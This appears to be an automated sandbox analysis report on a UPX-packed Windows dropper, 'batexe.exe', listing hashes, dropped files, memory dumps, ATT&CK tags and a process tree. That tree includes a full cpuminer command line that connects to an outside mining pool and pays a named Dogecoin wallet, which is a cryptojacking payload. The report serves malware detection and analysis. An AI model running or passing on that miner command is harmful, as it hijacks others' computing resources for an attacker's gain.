73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22-02-2024 04:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1536	b2e.exe
1688	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3060-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3060 wrote to memory of 1536	3060	batexe.exe	74
PID 3060 wrote to memory of 1536	3060	batexe.exe	74
PID 3060 wrote to memory of 1536	3060	batexe.exe	74
PID 1536 wrote to memory of 3196	1536	b2e.exe	75
PID 1536 wrote to memory of 3196	1536	b2e.exe	75
PID 1536 wrote to memory of 3196	1536	b2e.exe	75
PID 3196 wrote to memory of 1688	3196	cmd.exe	78
PID 3196 wrote to memory of 1688	3196	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3060
- C:\Users\Admin\AppData\Local\Temp\9460.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9460.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9460.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9654.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3196
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9460.tmp\b2e.exe

Filesize
2.2MB

MD5
762011b8cc59274ed0af7f58e2ab396f

SHA1
26b0a1b4faf307e2a4eb9c9d8c3e57ac81757fdc

SHA256
e97d90514faa90aa652c4f7e0d5d452635b526e5e2c669aae63563030744f479

SHA512
8de92db3fbcedc2907fb12759a24f6df798ffc418b3ae4c196ec6d637fa7f26873df6d50e2e3a79d977e67cb46b3c5011c4c220f43d12dd3f93b1e7634472b25

Download Submit
C:\Users\Admin\AppData\Local\Temp\9460.tmp\b2e.exe

Filesize
1.9MB

MD5
3a9874cd7cc4b888bba52409b8ab2d58

SHA1
265e96954efff438d3a9fe42eac73df71446b7b8

SHA256
626bfd78cc21afc499cc06143745101d8d4ffce819f3949b60042f6f66521a47

SHA512
5c0c157f5fad093a4295c3c8421e2d245372302c2a50244c10cf59ec5729617ff7a0db61fa0d21fc187a4b7fe1e355f4c3b740f63facf7c28bfd57df3e8a9367

Download Submit
C:\Users\Admin\AppData\Local\Temp\9654.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
611KB

MD5
50a3e682ce7eb3d9ff15ab2041fafe4b

SHA1
276dbf53b4a58447d554e4d015b6d228737983e9

SHA256
bee14ecbce67c8ae2b0dd38b6ef7d78510af037f64fe943f4e8160a0ed966717

SHA512
ee6c11e137fb89f64c8e6b2039e4bfcd38e129fcb5f0008851001dc60126064f57a258c9b14b37b81c521e301c8ab3b0913b430dabd9ff847c2bb6c20cfade34

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1012KB

MD5
9c8a2729c95aef790e4ec05d86efc045

SHA1
d1bc543f47bdc6dad3d62cb2256375f539727577

SHA256
f29fa11b4e4ac6825ddf2f50d0f267412dd6f1178bda2c746e35cf49a69a2694

SHA512
81bdbf629dc8ce6bbe8e33d8a508552e82a3367fa212746eff4c7c6383ec513b7e94a7b8b6f769c3c935de827fd468a23176b9838849feeea83f3e1cecdf17ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
497KB

MD5
d107489016f59318fc3babe861b7b2c8

SHA1
e26b765747cb153c6d81b2e0c4d1b3a34e298334

SHA256
1a923b5426a0fbfb78322a8b0b2efa51b8b67136f6f6513d4d6ee1508dfe58be

SHA512
c1e7602eea3200664e4939f34e21ad8c9f85938c5d96386aa0ac4149e57da14fd34b8011171074ee9571361d365e9233dcf50c767a6fe264cb0f3a4334137e02

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
677KB

MD5
9493a1ecd6cc00bf1cc837783e146f90

SHA1
0ef4d7465e9049cce549533bcd73b365e0ab16c7

SHA256
d45efd46079f8d35775755c12e8975a24ebf75526447a29f38f68ab343f59224

SHA512
592d4a303c643ce7b5e1c7f92da29ab46efc4072478e33bb6bfd404f84c6916ca2c76d6a00e690d4871d0d531b45445affd126e888edc327cabd9fa6b3c603f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
587KB

MD5
b270a3b7e4c455659121bff97e2f0d7b

SHA1
405cccb38b6eea1f52c2f0af30e8c8537a5dfdaa

SHA256
2adb9106554e3b01586b53159f7edee2ad039ff19001a5006a47ecf905c2b1c0

SHA512
cd74e7fa8acf45d3709ba8cca0ec86fa7503eaebc2f6bb278ab3e6c3768eb42b6a90bd19ac602c5ace55d4f2aad9136e9c4f6d92e6c77550565b8ddd032c16bb

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
500KB

MD5
e15aaed27475cbe4576009592b9ec0cf

SHA1
2ddd9f64addd20410eab0ab1a9bc18de0bfb5b2b

SHA256
7755e131411b9f05ef39fdc1c1aafe02dea1d95558c5b93840718f506cb44f73

SHA512
5c20b2c617dff5197380ddae985ccf19f8a1cdec42ac7ac2e09c2aa9c50290d0e92e070d6b33fbc4a4b4d5e19cda4dbb45edbf03f0f3822871704b3647f49ed2

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
689KB

MD5
97a4d422bdd3bf3e6b53a681cddcb52a

SHA1
9fcaf468eab9862927dd66bd67f5821f5ff3e530

SHA256
184f7f7642c92d8c7f837fe6872bbdce6b8cd437ca5e651b9370e0f1444ed93a

SHA512
17037069b0758daf761b3c0eb0ea584d6a72b8120f7e5418fa5cabe0e1b20468b6da110956593303e7a9215815aaa35dea8fc8600f11b0e7439e532d83632914

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
288KB

MD5
20f1e289daa9e0b49f4b2d463d0adc3e

SHA1
92f4c736f63c61cef994d1d48e117f71981a0e1b

SHA256
bdd6e0fabdad9820e5855ea24ecd1f750ae29476b35f656f68a5252841df9fcf

SHA512
6c7cf985bb1fb69b81c8b13840ca2e25111809965faba7159ecd7eb080c4cdc893d531ff65d7c53420e83600d504a12ab21b4c52af2df904802c97742c52bf99

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
659KB

MD5
9e494e9a98741fd42cdefac0672f6b21

SHA1
21dcf1bed1c1a23c54a15e341db2fc49cf369bb3

SHA256
f1905d5c4242306763141e90fd1cf3f43ccdbb48c4cccaa36ea0277be62f5238

SHA512
b1c83dc56583e047e02637d4557528917b49f8e7022730513c91b4654b8ec9b0ef7056ed88e8253768ec58404a88cfbc8f0ac66e44b19d291c43fb085ee61879

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
505KB

MD5
226d163c0e2365573a5d9b35f55261fa

SHA1
b6c2187f121d903a6c3092187540f0852d4a2020

SHA256
ba656ffc1ebd1d05f230b1e8c77a1a2c374a6f80b12ff51a6896e621f3d44284

SHA512
152535785be207740220531b5d82c99a5ff4121ace76bfb8da50295b8c57fd0c54111dfb805c6b1aed9123073b3c3e9daa7be3a253618f6acda2a891e10db7b9

Download Submit
memory/1536-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1536-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1688-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1688-42-0x0000000056F30000-0x0000000056FC8000-memory.dmp

Filesize
608KB

Download
memory/1688-44-0x0000000001010000-0x00000000028C5000-memory.dmp

Filesize
24.7MB

Download
memory/1688-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1688-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3060-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download